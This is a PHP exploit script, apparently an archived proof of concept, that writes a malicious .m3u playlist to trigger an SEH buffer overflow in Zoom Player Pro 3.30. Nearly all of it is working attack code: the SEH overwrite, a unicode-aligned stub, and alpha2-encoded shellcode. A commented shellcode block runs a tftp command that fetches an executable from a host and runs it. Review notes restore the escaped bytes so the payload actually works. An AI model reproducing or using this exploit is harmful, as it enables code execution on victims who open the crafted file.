# Title : Zoom Player Pro v.3.30 .m3u File Buffer Overflow Exploit (seh)
# Published : 2009-04-27
# Author : Nine:Situations:Group
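<?php
/*
Zoom Player Pro v.3.30 .m3u file buffer overflow exploit (seh)
by Nine:Situations:Group::surfista
seems the same of http://secunia.com/advisories/28214/
bug found by Luigi Auriemma
no full working exploit out, so I made my test version

Proof of concept: writes pwn.m3u into the current working directory for the
target player to open. Every address below (the pop/pop/ret inside
zplayer.exe, the WinExec pointer in kernel32.dll) was picked by the author for
this exact player build on Windows XP SP3; they will not hold on other builds
or on systems with ASLR, so this is a lab artefact, not a portable exploit.

NOTE(review): the archived listing had lost the backslash of every \x escape
("x23x45..." instead of "\x23\x45..."). They are restored here; without them
PHP writes the literal text, not the bytes, and the file is harmless garbage.
*/

/*
original shellcode, 27 bytes + command
re-encode with
alpha2 --unicode ecx <sh.txt

$scode =
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
"\xbb\x0d\x25\x86\x7c". // WinExec, kernel32.dll XP SP3 (hard-coded, SP-specific)
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff".
"cmd /c tftp -i 192.168.0.1 GET s s.exe && s && ". // author's lab host - change it
"\xff";
*/

/**
 * Build the malicious .m3u content.
 *
 * Layout, as laid out by the author (offsets are specific to this version):
 *   "#EXTM3U\r\nhttp://www"  - m3u header and the start of one URL entry
 *   0xfe8 x 'a'              - filler up to the SEH record
 *   SEH overwrite            - 0x004500d3 pop/pop/ret in zplayer.exe, then a
 *                              short stub that leaves eax + 0x2600 in ecx, the
 *                              base register the alpha2 --unicode decoder expects
 *   0x7f x "\x6e\x90"        - nop run
 *   "\x6e\x6a"               - one more pad byte and a push 0 (nop equivalent)
 *   encoded shellcode        - alpha2 --unicode output of the WinExec stub above
 *   0xbb8 x "\x90"           - trailing padding
 *
 * The author's notes (alpha2 --unicode, "unicode friendly" address, the \x6e
 * "nop equivalent" between every instruction) indicate the player widens the
 * entry to UTF-16 before overflowing, i.e. a 0x00 byte lands after every byte
 * sent, which is why the stub is written in 0x00-tolerant instructions.
 *
 * @return string Raw bytes to write to the .m3u file.
 */
function zplayer_m3u_payload(): string
{
    // alpha2 --unicode ecx encoded form of the commented WinExec stub above.
    $encodedShellcode =
        "IAIAIAIAIAIAIAIAIAIAIAIAIAIA4444jXAQADAZABARALAYAIAQAIAQAIAhAAAZ1" .
        "AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBhkMC1Kn" .
        "QWPnpNQGP3XPCPJaCEkJmo5TFsLYoHSNQUpiXgxyoKOKOosPmOtKpNOQSKp1d36rTp" .
        "pkpNMpimPNQp9nRlnnQP6lxNNlplnP1MPPGQ524O0RSO02SnN35rXPeKpLfKvKp43kpkvmVMPkOA";

    // Unicode preamble / alignment. [*] marks the \x6e pad byte that, once the
    // 0x00 is inserted after it, decodes as "add byte ptr [esi],ch" - a nop
    // equivalent that keeps the following instruction aligned (author's note).
    $sehStub =
        "\x6e" .          // [*]
        "\xd3\x45" .      // 0x004500d3 unicode friendly pop - pop - ret, zplayer.exe
        "\x6e" .          // [*]
        "\x05\x7f\x4c" .  // add eax,4c007f00h
        "\x6e" .          // [*]
        "\x2d\x59\x4c" .  // sub eax,4c005900h  (net effect: eax += 0x2600)
        "\x6e" .          // [*]
        "\x50" .          // push eax
        "\x6e" .          // [*]
        "\x59";           // pop ecx  -> ecx = decoder base register

    // "#EXTM3U\r\nhttp://www" is exactly the \x23\x45...\x77 sequence of the original.
    return "#EXTM3U\r\nhttp://www"
        . str_repeat("a", 0xfe8)                 // filler (0x61) up to the SEH record
        . $sehStub
        . str_repeat("\x6e\x90", 0x7f)           // nop run, pad byte before each nop
        . "\x6e"                                 // [*]
        . "\x6a"                                 // push 0, nop equivalent
        . $encodedShellcode
        . str_repeat("\x90", 0xbb8);
}

$payload = zplayer_m3u_payload();

// Written to the current working directory; open pwn.m3u in the target player.
// A short or failed write is reported on stderr with a non-zero exit status
// instead of the original unchecked fputs() and exit-code-0 die().
if (file_put_contents("pwn.m3u", $payload) !== strlen($payload)) {
    fwrite(STDERR, "[:(] Failed to create file...");
    exit(1);
}
print("[:)] Done!");
?>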